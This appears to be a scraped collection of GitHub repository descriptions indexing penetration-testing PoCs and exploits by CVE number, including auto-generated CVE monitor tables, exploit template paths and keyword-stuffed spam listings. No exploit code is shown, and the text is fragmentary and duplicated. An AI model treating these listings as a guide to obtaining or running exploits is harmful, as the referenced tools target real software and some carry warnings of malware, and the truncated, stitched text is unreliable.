渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 请注意所有工具是否有后门或者其他异常行为，建议均在虚拟环境操作。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集�

PoC in GitHub 2023 CVE-2023-0045 missyes/CVE-2023-0045 es0j/CVE-2023-0045 CVE-2023-0179 TurtleARM/CVE-2023-0179-PoC CVE-2023-0297 (2023-01-13) Code Injection in GitHub repository pyload/pyload prior to 050b3dev31 bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad CVE-2023-0315 (2023-01-15) Command Injection in GitHub repository froxlor/froxlor prior to 208 mhaskar/C

📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

PoC in GitHub 2023 CVE-2023-0045 (2023-04-25) The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall The ib_prctl_set  function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bi

Github CVE Monitor Automatic monitor github cve using Github Actions Last generated : 2023-11-27 01:54:56409018 CVE Name Description Date CVE-2023-9999 obelia01/CVE-2023-9999 test 2023-08-21T12:02:45Z CVE-2023-5815 codeb0ss/CVE-2023-5815-PoC no description 2023-10-26T22:50:26Z CVE-2023-5601 codeb0ss/CVE-2023-5601-PoC no description 2023-10-19T00:47:06Z CVE-2023-

Github CVE Monitor Automatic monitor github cve using Github Actions Last generated : 2023-11-28 01:55:33286580 CVE Name Description Date CVE-2023-9999 obelia01/CVE-2023-9999 test 2023-08-21T12:02:45Z CVE-2023-5815 codeb0ss/CVE-2023-5815-PoC no description 2023-10-26T22:50:26Z CVE-2023-5601 codeb0ss/CVE-2023-5601-PoC no description 2023-10-19T00:47:06Z CVE-2023-

essential templates for kenzer [DEPRECATED]

Kenzer Templates [5170] [DEPRECATED] TEMPLATE TOOL FILE favinizer favinizer favinizeryaml CVE-2013-2251 freaker freaker/exploits/CVE-2013-2251/exploitsh CVE-2017-6360 freaker freaker/exploits/CVE-2017-6360/exploitsh CVE-2017-6361 freaker freaker/exploits/CVE-2017-6361/exploitsh CVE-2017-7921 freaker freaker/exploits/CVE-2017-7921/exploitsh CVE-2018-11784 f

test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC

CVE-2022-XXXX 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload CVE-2022-20550 CVE-2022-20551 CVE-2022-20552 CVE-2022-20553 CVE-2022-20554 CVE-2022-20555 CVE-2022-20556 CVE-2022-20557 CVE-2022-20558 CVE-2022-20559 CVE-2022-20560 CVE-2022-20561 CVE-2022-20562 CVE-2022-20563 CVE-2022-20564 CVE-2022-20565 CVE-2022-20566 CVE-2

test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC

CVE-2022-XXXX 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload CVE-2022-20550 CVE-2022-20551 CVE-2022-20552 CVE-2022-20553 CVE-2022-20554 CVE-2022-20555 CVE-2022-20556 CVE-2022-20557 CVE-2022-20558 CVE-2022-20559 CVE-2022-20560 CVE-2022-20561 CVE-2022-20562 CVE-2022-20563 CVE-2022-20564 CVE-2022-20565 CVE-2022-20566 CVE-2